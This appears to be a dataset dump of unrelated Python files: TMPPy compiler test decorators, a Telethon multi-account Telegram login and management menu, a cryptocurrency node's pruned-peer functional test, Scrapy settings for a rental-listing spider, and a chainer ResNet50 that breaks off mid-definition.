                                    tmppy_ir1=str(module_ir1),
                                    cpp_source=str(cpp_source),
                                    expected_cpp_source=str(expected_cpp_source[1:]),
                                    cpp_source_diff=''.join(difflib.unified_diff(expected_cpp_source[1:].splitlines(True),
                                                                                cpp_source.splitlines(True),
                                                                                fromfile='expected.h',
                                                                                tofile='actual.h'))),
                    pytrace=False)
        return wrapper
    return decorator
def assert_compilation_fails(expected_py2tmp_error_regex: str, expected_py2tmp_error_desc_regex: str):
    """Test decorator factory: the decorated function's body is TMPPy source
    whose generated C++ must fail to compile with the given _py2tmp error type
    and static_assert message (see expect_cpp_code_compile_error).
    """
    # Renamed the inner function from `eval`, which shadowed the builtin.
    def decorator(f):
        @wraps(f)
        def wrapper():
            tmppy_source = _get_function_body(f)
            module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
            expect_cpp_code_compile_error(
                expected_py2tmp_error_regex,
                expected_py2tmp_error_desc_regex,
                tmppy_source,
                module_ir2,
                module_ir1,
                cpp_source)
        return wrapper
    return decorator
# TODO: Check that the error is reported on the desired line (moving the regex to a comment in the test).
def assert_compilation_fails_with_generic_error(expected_error_regex: str):
    """Test decorator factory: the decorated function's body is TMPPy source
    whose generated C++ must fail to compile with a compiler-output line
    matching expected_error_regex.
    """
    # Renamed the inner function from `eval`, which shadowed the builtin.
    def decorator(f):
        @wraps(f)
        def wrapper():
            tmppy_source = _get_function_body(f)
            module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
            expect_cpp_code_generic_compile_error(
                expected_error_regex,
                tmppy_source,
                module_ir2,
                module_ir1,
                cpp_source)
        return wrapper
    return decorator
# TODO: Check that the error is reported on the desired line (moving the regex to a comment in the test).
def assert_compilation_fails_with_static_assert_error(expected_error_regex: str):
    """Test decorator factory: the decorated function's body is TMPPy source
    whose generated C++ must fail with a static_assert diagnostic matching
    expected_error_regex (both GCC/Clang message forms are accepted).
    """
    # Renamed the inner function from `eval`, which shadowed the builtin.
    def decorator(f):
        @wraps(f)
        def wrapper():
            tmppy_source = _get_function_body(f)
            module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
            expect_cpp_code_generic_compile_error(
                r'(error: static assertion failed: |error: static_assert failed .)' + expected_error_regex,
                tmppy_source,
                module_ir2,
                module_ir1,
                cpp_source)
        return wrapper
    return decorator
def _split_list(l, num_elems_in_chunk):
args = [iter(l)] * num_elems_in_chunk
return list(itertools.zip_longest(*args))
def _get_line_from_diagnostic(diagnostic):
matches = re.match('<unknown>:([0-9]*):', diagnostic)
return int(matches.group(1))
def assert_conversion_fails(f):
    """Test decorator: the decorated function's body is TMPPy source annotated
    with expected diagnostics.

    Exactly one line must carry a trailing ' # error: <regex>' marker; lines
    may carry ' # note: <regex>' markers. The TMPPy conversion must fail with
    an error matching the regex on that exact line, and the emitted notes must
    match the note markers one-to-one.
    """
    @wraps(f)
    def wrapper():
        tmppy_source = _get_function_body(f)
        actual_source_lines = []
        expected_error_regex = None
        expected_error_line = None
        expected_note_by_line = dict()
        # Strip the diagnostic markers from the source, remembering which
        # line each one was attached to (1-based).
        for line_index, line in enumerate(tmppy_source.splitlines()):
            error_regex_marker = ' # error: '
            note_regex_marker = ' # note: '
            if error_regex_marker in line:
                if expected_error_regex:
                    pytest.fail('Multiple expected errors in the same test are not supported', pytrace=False)
                [line, expected_error_regex] = line.split(error_regex_marker)
                expected_error_line = line_index + 1
            elif note_regex_marker in line:
                [line, expected_note_regex] = line.split(note_regex_marker)
                expected_note_by_line[line_index + 1] = expected_note_regex
            actual_source_lines.append(line)
        if not expected_error_regex:
            pytest.fail(
                textwrap.dedent('''\
                    assert_conversion_fails was used, but no expected error regex was found.
                    TMPPy source:
                    {tmppy_source}
                    ''').format(tmppy_source = add_line_numbers(tmppy_source)),
                pytrace=False)
        try:
            module_ir2, module_ir1 = _convert_tmppy_source_to_ir('\n'.join(actual_source_lines), create_identifier_generator())
            e = None
        except ast_to_ir3.CompilationError as e1:
            e = e1
        if not e:
            pytest.fail(
                textwrap.dedent('''\
                    Expected an exception, but the _py2tmp conversion completed successfully.
                    TMPPy source:
                    {tmppy_source}
                    TMPPy IR2:
                    {tmppy_ir2}
                    TMPPy IR1:
                    {tmppy_ir1}
                    ''').format(tmppy_source=add_line_numbers(tmppy_source),
                                tmppy_ir2=str(module_ir2),
                                tmppy_ir1=str(module_ir1)),
                pytrace=False)
        # py2tmp diagnostics take up 3 lines each, e.g.:
        # <unknown>:2:11: error: Empty lists are not currently supported.
        #     return []
        #            ^
        py2tmp_diagnostics = _split_list(e.args[0].splitlines(), num_elems_in_chunk=3)
        error_diagnostic = py2tmp_diagnostics[0]
        expected_error_regex = '<unknown>:[0-9]*:[0-9]*: error: ' + expected_error_regex
        if not re.match(expected_error_regex, error_diagnostic[0]):
            pytest.fail(
                textwrap.dedent('''\
                    An exception was thrown, but it didn\'t match the expected error regex.
                    Expected error regex: {expected_error_regex}
                    Actual error:
                    {actual_error}
                    TMPPy source:
                    {tmppy_source}
                    ''').format(expected_error_regex = expected_error_regex,
                                actual_error = '\n'.join(error_diagnostic),
                                tmppy_source = add_line_numbers(tmppy_source)),
                pytrace=False)
        matches = re.match('<unknown>:([0-9]*):', error_diagnostic[0])
        actual_error_line = int(matches.group(1))
        if expected_error_line != actual_error_line:
            pytest.fail(
                textwrap.dedent('''\
                    An exception matching the expected regex was thrown, but the error mentioned the wrong line: {actual_error_line} was reported instead of {expected_error_line}
                    Expected error regex: {expected_error_regex}
                    Actual error:
                    {actual_error}
                    TMPPy source:
                    {tmppy_source}
                    ''').format(actual_error_line=actual_error_line,
                                expected_error_line=expected_error_line,
                                expected_error_regex = expected_error_regex,
                                actual_error = '\n'.join(error_diagnostic),
                                tmppy_source = add_line_numbers(tmppy_source)),
                pytrace=False)
        actual_note_by_line = {_get_line_from_diagnostic(note[0]): note
                               for note in py2tmp_diagnostics[1:]}
        for expected_note_line, expected_note_regex in expected_note_by_line.items():
            actual_note = actual_note_by_line.get(expected_note_line)
            if not actual_note:
                raise Exception('Expected the note %s on line %s but no note was emitted mentioning this line. Emitted notes: %s' % (
                    expected_note_regex, expected_note_line, json.dumps(actual_note_by_line, indent=4)))
            expected_note_regex = '<unknown>:[0-9]*:[0-9]*: note: ' + expected_note_regex
            if not re.match(expected_note_regex, actual_note[0]):
                pytest.fail(
                    textwrap.dedent('''\
                        A note diagnostic was emitted, but it didn\'t match the expected note regex.
                        Expected note regex: {expected_note_regex}
                        Actual note:
                        {actual_note}
                        TMPPy source:
                        {tmppy_source}
                        ''').format(expected_note_regex = expected_note_regex,
                                    actual_note = '\n'.join(actual_note),
                                    tmppy_source = add_line_numbers(tmppy_source)),
                    pytrace=False)
        for actual_note_line, actual_note in actual_note_by_line.items():
            expected_note = expected_note_by_line.get(actual_note_line)
            if not expected_note:
                # Bug fix: pytrace=False was previously passed to str.format()
                # (where it was silently ignored) instead of pytest.fail().
                pytest.fail(
                    textwrap.dedent('''\
                        Unexpected note:
                        {actual_note}
                        TMPPy source:
                        {tmppy_source}
                        ''').format(actual_note = '\n'.join(actual_note),
                                    tmppy_source = add_line_numbers(tmppy_source)),
                    pytrace=False)
    return wrapper
def assert_conversion_fails_with_codegen_error(expected_error_regex: str):
    """Test decorator factory: the decorated function's body is TMPPy source
    whose conversion must fail with an ir0.CodegenError whose message matches
    expected_error_regex.
    """
    # Renamed the inner function from `eval`, which shadowed the builtin.
    def decorator(f):
        @wraps(f)
        def wrapper():
            tmppy_source = _get_function_body(f)
            try:
                module_ir2, module_ir1, cpp_source = _convert_to_cpp_expecting_success(tmppy_source)
                e = None
            except ir0.CodegenError as e1:
                e = e1
            if not e:
                # Bug fix: the template printed {tmppy_ir2} twice; the line
                # under 'TMPPy IR1:' now correctly prints {tmppy_ir1}.
                pytest.fail(
                    textwrap.dedent('''\
                        Expected a codegen error, but the _py2tmp conversion completed successfully.
                        TMPPy source:
                        {tmppy_source}
                        TMPPy IR2:
                        {tmppy_ir2}
                        TMPPy IR1:
                        {tmppy_ir1}
                        C++ source:
                        {cpp_source}
                        ''').format(tmppy_source=add_line_numbers(tmppy_source),
                                    tmppy_ir2=str(module_ir2),
                                    tmppy_ir1=str(module_ir1),
                                    cpp_source=add_line_numbers(cpp_source)),
                    pytrace=False)
            if not re.match(expected_error_regex, e.args[0]):
                pytest.fail(
                    textwrap.dedent('''\
                        A codegen error was emitted as expected, but it didn\'t match the expected note regex.
                        Expected error regex: {expected_error_regex}
                        Actual error:
                        {actual_error}
                        TMPPy source:
                        {tmppy_source}
                        TMPPy IR2:
                        {tmppy_ir2}
                        TMPPy IR1:
                        {tmppy_ir1}
                        C++ source:
                        {cpp_source}
                        ''').format(expected_error_regex = expected_error_regex,
                                    actual_error = e.args[0],
                                    tmppy_source = add_line_numbers(tmppy_source),
                                    tmppy_ir2=str(module_ir2),
                                    tmppy_ir1=str(module_ir1),
                                    cpp_source=add_line_numbers(cpp_source)),
                    pytrace=False)
        return wrapper
    return decorator
# Note: this is not the main function of this file, it's meant to be used as main function from test_*.py files.
# Note: this is not the main function of this file, it's meant to be used as
# main function from test_*.py files.
def main(file):
    """Run pytest on `file` (plus any CLI args) and exit with its status code.

    :param file: path of the calling test file; resolved to an absolute path
        before being handed to pytest.
    """
    code = pytest.main(args=sys.argv + [os.path.realpath(file)])
    # Use sys.exit rather than the site-injected exit() helper, which is not
    # guaranteed to exist when Python runs without the site module.
    sys.exit(code)
| _py2tmp/testing/utils.py | 41,449 | Tests that the given source produces the expected error during compilation.
:param expected_py2tmp_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param expected_py2tmp_error_desc_regex: A regex used to match the _py2tmp error description,
e.g. 'No explicit binding was found for C, and C is an abstract class'.
:param source_code: The C++ source code. This will be dedented.
:param ignore_deprecation_warnings: A boolean. If True, deprecation warnings will be ignored.
Tests that the given source produces the expected error during compilation.
:param expected_error_regex: A regex used to match the _py2tmp error type,
e.g. 'NoBindingFoundForAbstractClassError<ScalerImpl>'.
:param cxx_source: The second part of the source code. This will be dedented.
Tests that the given source compiles and runs successfully.
:param source_code: The C++ source code. This will be dedented.
!/usr/bin/env python3 Copyright 2017 Google Inc. All Rights Reserved. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS-IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. Note that we use stdout here, unlike above. MSVC reports compilation warnings and errors on stdout. When running tests on Windows using Appveyor, the remove command fails for temporary files sometimes. This shouldn't cause the tests to fail, so we ignore the exception and go ahead. Different compilers output a different number of spaces when pretty-printing types. When using libc++, sometimes std::foo identifiers are reported as std::__1::foo. MSVC errors are of the form: C:\Path\To\header\foo.h(59): note: see reference to class template instantiation 'tmppy::impl::MyError<X, Y>' being compiled with [ X=int, Y=double ] So we need to parse the following few lines and use them to replace the placeholder types in the tmppy error type. 6 is just a constant that works for both g++ (<=6.0.0 at least) and clang++ (<=4.0.0 at least). It might need to be changed. Note that we don't delete the temporary files if the test failed. This is intentional, keeping them around helps debugging the failure. Skip the annotation and the line where the function is defined. The body of some tests is a multiline string because they would otherwise cause the pytest test file to fail parsing. TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test). TODO: Check that the error is s reported on the desired line (moving the regex to a comment in the test). 
py2tmp diagnostics take up 3 lines each, e.g.: <unknown>:2:11: error: Empty lists are not currently supported. return [] ^ Note: this is not the main function of this file, it's meant to be used as main function from test_*.py files. | 3,257 | en | 0.823391 |
import requests
from telethon.sync import TelegramClient
from telethon.errors.rpcerrorlist import PhoneNumberBannedError
import pickle, pyfiglet
from colorama import init, Fore
import os, random
from time import sleep
# Initialise colorama so ANSI colour codes also work on Windows consoles.
init()

# Colour shorthands used throughout the menus.
lg = Fore.LIGHTGREEN_EX
w = Fore.WHITE
cy = Fore.CYAN
ye = Fore.YELLOW
r = Fore.RED
n = Fore.RESET  # reset back to the default terminal colour

# Palette the banner picks a random colour from.
colors = [lg, r, w, cy, ye]
def banner():
    """Print the 'Telegram' ASCII-art banner in a randomly chosen colour,
    followed by the version/author line."""
    figlet = pyfiglet.Figlet(font='slant')
    art = figlet.renderText('Telegram')
    print(f'{random.choice(colors)}{art}{n}')
    print(r + ' Version: 1 | Author: Shabani' + n + '\n')
def clr():
    """Clear the terminal screen (works on both Windows and POSIX)."""
    os.system('cls' if os.name == 'nt' else 'clear')
# Interactive main-menu loop; runs until the user picks option 5 (Quit).
# Account credentials are stored in vars.txt as pickled [api_id, api_hash,
# phone] lists; Telethon session files live under sessions/.
while True:
    clr()
    #print(r)
    banner()
    #print(n)
    print(lg+'[1] Add new accounts'+n)
    print(lg+'[2] Filter all banned accounts'+n)
    print(lg+'[3] List out all the accounts'+n)
    print(lg+'[4] Delete specific accounts'+n)
    #print(lg+'[5] Update your Genisys'+n)
    print(lg+'[5] Quit')
    a = int(input(f'\nEnter your choice: {r}'))
    if a == 1:
        # Option 1: prompt for credentials, append them to vars.txt, then log
        # in once per new account to create its Telethon session file.
        with open('vars.txt', 'ab') as g:
            newly_added = []
            while True:
                a = int(input(f'\n{lg}Enter API ID: {r}'))
                b = str(input(f'{lg}Enter API Hash: {r}'))
                c = str(input(f'{lg}Enter Phone Number: {r}'))
                # Strip all whitespace from the phone number.
                p = ''.join(c.split())
                pickle.dump([a, b, p], g)
                newly_added.append([a, b, p])
                ab = input(f'\nDo you want to add more accounts?[y/n]: ')
                if 'y' in ab:
                    pass
                else:
                    print('\n'+lg+'[i] Saved all accounts in vars.txt'+n)
                    g.close()
                    sleep(3)
                    clr()
                    print(lg + '[*] Logging in from new accounts...\n')
                    for added in newly_added:
                        # added = [api_id, api_hash, phone]
                        c = TelegramClient(f'sessions/{added[2]}', added[0], added[1])
                        try:
                            c.start()
                            # NOTE(review): the leading 'n' in this f-string
                            # prints a literal "n" -- likely a typo for '\n'.
                            print(f'n\n{lg}[+] Logged in - {added[2]}')
                            c.disconnect()
                        except PhoneNumberBannedError:
                            print(f'{r}[!] {added[2]} is banned! Filter it using option 2')
                            continue
                    print('\n')
                    input(f'\n{lg}Press enter to goto main menu...')
                    break
            g.close()
    elif a == 2:
        # Option 2: try to authorize every stored account and rewrite
        # vars.txt without the ones Telegram reports as banned.
        accounts = []
        banned_accs = []
        h = open('vars.txt', 'rb')
        # vars.txt holds one pickled record per account; read until EOF.
        while True:
            try:
                accounts.append(pickle.load(h))
            except EOFError:
                break
        h.close()
        if len(accounts) == 0:
            print(r+'[!] There are no accounts! Please add some and retry')
            sleep(3)
        else:
            for account in accounts:
                api_id = int(account[0])
                api_hash = str(account[1])
                phone = str(account[2])
                client = TelegramClient(f'sessions\\{phone}', api_id, api_hash)
                client.connect()
                if not client.is_user_authorized():
                    try:
                        client.send_code_request(phone)
                        client.sign_in(phone, input('[+] Enter the code: '))
                    except PhoneNumberBannedError:
                        print(r+str(phone) + ' is banned!'+n)
                        banned_accs.append(account)
            if len(banned_accs) == 0:
                print(lg+'Congrats! No banned accounts')
                input('\nPress enter to goto main menu')
            else:
                # Rewrite vars.txt keeping only the non-banned accounts.
                for m in banned_accs:
                    accounts.remove(m)
                with open('vars.txt', 'wb') as k:
                    for a in accounts:
                        Id = a[0]
                        Hash = a[1]
                        Phone = a[2]
                        pickle.dump([Id, Hash, Phone], k)
                    k.close()
                print(lg+'[i] All banned accounts removed'+n)
                input('\nPress enter to goto main menu')
    elif a == 3:
        # Option 3: print a table of all stored accounts.
        display = []
        j = open('vars.txt', 'rb')
        while True:
            try:
                display.append(pickle.load(j))
            except EOFError:
                break
        j.close()
        print(f'\n{lg}')
        print(f'API ID | API Hash | Phone')
        print(f'==========================================================')
        i = 0
        for z in display:
            print(f'{z[0]} | {z[1]} | {z[2]}')
            i += 1
        print(f'==========================================================')
        input('\nPress enter to goto main menu')
    elif a == 4:
        # Option 4: delete one account -- remove its session file on disk
        # and rewrite vars.txt without its record.
        accs = []
        f = open('vars.txt', 'rb')
        while True:
            try:
                accs.append(pickle.load(f))
            except EOFError:
                break
        f.close()
        i = 0
        print(f'{lg}[i] Choose an account to delete\n')
        for acc in accs:
            print(f'{lg}[{i}] {acc[2]}{n}')
            i += 1
        index = int(input(f'\n{lg}[+] Enter a choice: {n}'))
        phone = str(accs[index][2])
        session_file = phone + '.session'
        if os.name == 'nt':
            os.system(f'del sessions\\{session_file}')
        else:
            os.system(f'rm sessions/{session_file}')
        del accs[index]
        f = open('vars.txt', 'wb')
        for account in accs:
            pickle.dump(account, f)
        print(f'\n{lg}[+] Account Deleted{n}')
        input(f'{lg}Press enter to goto main menu{n}')
        f.close()
    elif a == 5:
        # Option 5: show the banner one last time and exit.
        clr()
        banner()
        quit()
#!/usr/bin/env python3
# Copyright (c) 2017-2020 The Vadercoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that."""
from test_framework.messages import CInv, MSG_BLOCK, msg_getdata, msg_verack, NODE_NETWORK_LIMITED, NODE_WITNESS
from test_framework.p2p import P2PInterface
from test_framework.test_framework import VadercoinTestFramework
from test_framework.util import (
assert_equal,
)
class P2PIgnoreInv(P2PInterface):
    """P2P peer that ignores block invs and remembers the services field of
    the first address the node relays to us."""
    firstAddrnServices = 0

    def on_inv(self, message):
        """The node will send us invs for other blocks; ignore them."""
        pass

    def on_addr(self, message):
        """Record the services advertised in the first relayed address."""
        self.firstAddrnServices = message.addrs[0].nServices

    def wait_for_addr(self, timeout=5):
        """Block until an addr message has been received."""
        self.wait_until(lambda: self.last_message.get("addr"), timeout=timeout)

    def send_getdata_for_block(self, blockhash):
        """Send a getdata request for the block with the given hex hash."""
        request = msg_getdata()
        request.inv.append(CInv(MSG_BLOCK, int(blockhash, 16)))
        self.send_message(request)
class NodeNetworkLimitedTest(VadercoinTestFramework):
    """Exercises NODE_NETWORK_LIMITED signalling and block serving on a
    pruned node (see the module docstring for the scenario)."""

    def set_test_params(self):
        self.setup_clean_chain = True
        self.num_nodes = 3
        # node0 is pruned (and so signals NODE_NETWORK_LIMITED);
        # node1 and node2 run with default (unpruned) settings.
        self.extra_args = [['-prune=550', '-addrmantest'], [], []]

    def disconnect_all(self):
        """Disconnect every pair of nodes."""
        self.disconnect_nodes(0, 1)
        self.disconnect_nodes(0, 2)
        self.disconnect_nodes(1, 2)

    def setup_network(self):
        # Start the nodes without connecting them; run_test makes each
        # connection explicitly.
        self.add_nodes(self.num_nodes, self.extra_args)
        self.start_nodes()

    def run_test(self):
        node = self.nodes[0].add_p2p_connection(P2PIgnoreInv())

        expected_services = NODE_WITNESS | NODE_NETWORK_LIMITED

        self.log.info("Check that node has signalled expected services.")
        assert_equal(node.nServices, expected_services)

        self.log.info("Check that the localservices is as expected.")
        assert_equal(int(self.nodes[0].getnetworkinfo()['localservices'], 16), expected_services)

        self.log.info("Mine enough blocks to reach the NODE_NETWORK_LIMITED range.")
        self.connect_nodes(0, 1)
        blocks = self.nodes[1].generatetoaddress(292, self.nodes[1].get_deterministic_priv_key().address)
        self.sync_blocks([self.nodes[0], self.nodes[1]])

        self.log.info("Make sure we can max retrieve block at tip-288.")
        node.send_getdata_for_block(blocks[1])  # last block in valid range
        node.wait_for_block(int(blocks[1], 16), timeout=3)

        self.log.info("Requesting block at height 2 (tip-289) must fail (ignored).")
        node.send_getdata_for_block(blocks[0])  # first block outside of the 288+2 limit
        node.wait_for_disconnect(5)

        self.log.info("Check local address relay, do a fresh connection.")
        self.nodes[0].disconnect_p2ps()
        node1 = self.nodes[0].add_p2p_connection(P2PIgnoreInv())
        node1.send_message(msg_verack())

        node1.wait_for_addr()
        # must relay address with NODE_NETWORK_LIMITED
        assert_equal(node1.firstAddrnServices, expected_services)

        self.nodes[0].disconnect_p2ps()

        # Connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer.
        # Because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer,
        # sync must not be possible.
        self.connect_nodes(0, 2)
        try:
            self.sync_blocks([self.nodes[0], self.nodes[2]], timeout=5)
        except Exception:
            # The sync is expected to time out. Catch Exception (not a bare
            # except:) so KeyboardInterrupt/SystemExit are not swallowed.
            pass
        # node2 must remain at height 0
        assert_equal(self.nodes[2].getblockheader(self.nodes[2].getbestblockhash())['height'], 0)

        # Now connect node 2 also to node 1 (non pruned); sync must be possible.
        self.connect_nodes(1, 2)
        self.sync_blocks()

        # Disconnect all peers and mine 10 blocks on node 0 (the pruned node).
        self.disconnect_all()
        self.nodes[0].generatetoaddress(10, self.nodes[0].get_deterministic_priv_key().address)

        # Connect node1 (non pruned) with node0 (pruned) and check they sync.
        # Node 1 is no longer in IBD and should therefore connect to node 0
        # (NODE_NETWORK_LIMITED).
        self.connect_nodes(0, 1)
        self.sync_blocks([self.nodes[0], self.nodes[1]])
if __name__ == '__main__':
    # Run the functional test when invoked directly.
    NodeNetworkLimitedTest().main()
| test/functional/p2p_node_network_limited.py | 4,627 | Tests NODE_NETWORK_LIMITED.
Tests that a node configured with -prune=550 signals NODE_NETWORK_LIMITED correctly
and that it responds to getdata requests for blocks correctly:
- send a block within 288 + 2 of the tip
- disconnect peers who request blocks older than that.
!/usr/bin/env python3 Copyright (c) 2017-2020 The Vadercoin Core developers Distributed under the MIT software license, see the accompanying file COPYING or http://www.opensource.org/licenses/mit-license.php. The node will send us invs for other blocks. Ignore them. last block in valid range first block outside of the 288+2 limitmust relay address with NODE_NETWORK_LIMITED connect unsynced node 2 with pruned NODE_NETWORK_LIMITED peer because node 2 is in IBD and node 0 is a NODE_NETWORK_LIMITED peer, sync must not be possible node2 must remain at height 0 now connect also to node 1 (non pruned) sync must be possible disconnect all peers mine 10 blocks on node 0 (pruned node) connect node1 (non pruned) with node0 (pruned) and check if the can sync sync must be possible, node 1 is no longer in IBD and should therefore connect to node 0 (NODE_NETWORK_LIMITED) | 1,149 | en | 0.794128 |
# -*- coding: utf-8 -*-

# Scrapy settings for the BeiKeZuFang (Beike rental listings) spider project.

BOT_NAME = 'BeiKeZuFangSpider'

SPIDER_MODULES = ['BeiKeZuFangSpider.spiders']
NEWSPIDER_MODULE = 'BeiKeZuFangSpider.spiders'

# Obey robots.txt rules
ROBOTSTXT_OBEY = True

# Configure maximum concurrent requests performed by Scrapy (default: 16)
# CONCURRENT_REQUESTS = 32

# Configure a delay for requests for the same website (default: 0)
# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
# DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
# CONCURRENT_REQUESTS_PER_DOMAIN = 16
# CONCURRENT_REQUESTS_PER_IP = 16

# Disable cookies (enabled by default)
# COOKIES_ENABLED = False

# Kafka configuration
# Kafka bootstrap servers, as host:port strings (default: localhost:9092)
KAFKA_IP_PORT = ["localhost:9092"]
# Kafka topic name
KAFKA_TOPIC_NAME = "BeiKeZuFang"

# MongoDB configuration
MONGODB_HOST = "127.0.0.1"
MONGODB_PORT = 27017
MONGODB_USER = ""
MONGODB_PASS = ""
MONGODB_DB_NAME = "BeiKeData"
MONGODB_COL_NAME = "ZuFang"

# CSV export
CSV_EXPORTER = True
CSV_DEFAULT_PATH = "./ExportData/"

# Disable Telnet Console (enabled by default)
TELNETCONSOLE_ENABLED = False

# Override the default request headers:
# DEFAULT_REQUEST_HEADERS = {
#    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
#    'Accept-Language': 'en',
# }

# Enable or disable spider middlewares
# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html
# SPIDER_MIDDLEWARES = {
#    'BeiKeZuFangSpider.middlewares.BeikezufangspiderSpiderMiddleware': 543,
# }

# Enable or disable downloader middlewares
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html
# Disable the built-in UserAgentMiddleware and use the project's random
# user-agent middleware instead.
# NOTE(review): recent Scrapy versions expose this middleware as
# 'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware' (plural
# "downloadermiddlewares") -- verify this path against the installed version.
DOWNLOADER_MIDDLEWARES = {
    'scrapy.downloadermiddleware.useragent.UserAgentMiddleware': None,
    'BeiKeZuFangSpider.middlewares.BeiKeZuFangScrapyUserAgentMiddleware': 400,
}

# Enable or disable extensions
# See https://doc.scrapy.org/en/latest/topics/extensions.html
# EXTENSIONS = {
#    'scrapy.extensions.telnet.TelnetConsole': None,
# }

# Configure item pipelines
# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html
ITEM_PIPELINES = {
    'BeiKeZuFangSpider.pipelines.BeiKeZuFangSpiderPipeline': 1,
}

# Enable and configure the AutoThrottle extension (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/autothrottle.html
# AUTOTHROTTLE_ENABLED = True
# The initial download delay
# AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
# AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
# AUTOTHROTTLE_DEBUG = False

# Enable and configure HTTP caching (disabled by default)
# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
# HTTPCACHE_ENABLED = True
# HTTPCACHE_EXPIRATION_SECS = 0
# HTTPCACHE_DIR = 'httpcache'
# HTTPCACHE_IGNORE_HTTP_CODES = []
# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
https://doc.scrapy.org/en/latest/topics/downloader-middleware.htmlhttpcache-middleware-settings HTTPCACHE_ENABLED = True HTTPCACHE_EXPIRATION_SECS = 0 HTTPCACHE_DIR = 'httpcache' HTTPCACHE_IGNORE_HTTP_CODES = [] HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' | 2,237 | en | 0.564759 |
# Original author: yasunorikudo
# (https://github.com/yasunorikudo/chainer-ResNet)
import chainer
import chainer.functions as F
from chainer import initializers
import chainer.links as L
class BottleNeckA(chainer.Chain):
    """Bottleneck residual block with a projection shortcut.

    Main path: 1x1 (stride) -> 3x3 -> 1x1 convolutions, each followed by
    batch normalization; shortcut: 1x1 (stride) convolution + batch
    normalization. Output is relu(main + shortcut).
    """

    def __init__(self, in_size, ch, out_size, stride=2):
        super(BottleNeckA, self).__init__()
        init_w = initializers.HeNormal()

        with self.init_scope():
            # Main branch.
            self.conv1 = L.Convolution2D(in_size, ch, 1, stride, 0,
                                         initialW=init_w, nobias=True)
            self.bn1 = L.BatchNormalization(ch)
            self.conv2 = L.Convolution2D(ch, ch, 3, 1, 1,
                                         initialW=init_w, nobias=True)
            self.bn2 = L.BatchNormalization(ch)
            self.conv3 = L.Convolution2D(ch, out_size, 1, 1, 0,
                                         initialW=init_w, nobias=True)
            self.bn3 = L.BatchNormalization(out_size)
            # Projection shortcut.
            self.conv4 = L.Convolution2D(in_size, out_size, 1, stride, 0,
                                         initialW=init_w, nobias=True)
            self.bn4 = L.BatchNormalization(out_size)

    def __call__(self, x):
        main = F.relu(self.bn1(self.conv1(x)))
        main = F.relu(self.bn2(self.conv2(main)))
        main = self.bn3(self.conv3(main))
        shortcut = self.bn4(self.conv4(x))
        return F.relu(main + shortcut)
class BottleNeckB(chainer.Chain):
    """Bottleneck residual block with an identity shortcut.

    Main path: 1x1 -> 3x3 -> 1x1 convolutions, each followed by batch
    normalization. Output is relu(main + x); input/output channels match.
    """

    def __init__(self, in_size, ch):
        super(BottleNeckB, self).__init__()
        init_w = initializers.HeNormal()

        with self.init_scope():
            self.conv1 = L.Convolution2D(in_size, ch, 1, 1, 0,
                                         initialW=init_w, nobias=True)
            self.bn1 = L.BatchNormalization(ch)
            self.conv2 = L.Convolution2D(ch, ch, 3, 1, 1,
                                         initialW=init_w, nobias=True)
            self.bn2 = L.BatchNormalization(ch)
            self.conv3 = L.Convolution2D(ch, in_size, 1, 1, 0,
                                         initialW=init_w, nobias=True)
            self.bn3 = L.BatchNormalization(in_size)

    def __call__(self, x):
        main = F.relu(self.bn1(self.conv1(x)))
        main = F.relu(self.bn2(self.conv2(main)))
        main = self.bn3(self.conv3(main))
        return F.relu(main + x)
class Block(chainer.ChainList):
    """One ResNet stage: a BottleNeckA (projection shortcut, optional
    stride) followed by ``layer - 1`` BottleNeckB blocks."""

    def __init__(self, layer, in_size, ch, out_size, stride=2):
        super(Block, self).__init__()
        self.add_link(BottleNeckA(in_size, ch, out_size, stride))
        for _ in range(layer - 1):
            self.add_link(BottleNeckB(out_size, ch))
        self._layer = layer

    def __call__(self, x):
        """Apply every bottleneck block in sequence."""
        for link in self.children():
            x = link(x)
        return x

    @property
    def layer(self):
        """Number of bottleneck blocks in this stage."""
        return self._layer
class ResNet50(chainer.Chain):
    """ResNet-50 classifier with optional class-activation-map (CAM) output.

    Weights can be initialized from a pre-trained Caffe model via
    ``caffemodel_path``.
    """

    def __init__(self, class_num, insize, class_weight=None, caffemodel_path=None):
        # The network downsamples by a factor of 32 overall (conv1 stride 2,
        # max-pool stride 2, and stride-2 stages res3/res4/res5), and
        # forward() average-pools over an (insize // 32)-sized window, hence
        # the divisibility requirement.
        assert (insize % 32 == 0), "'insize' should be divisible by 32."
        super(ResNet50, self).__init__()
        with self.init_scope():
            self.conv1 = L.Convolution2D(
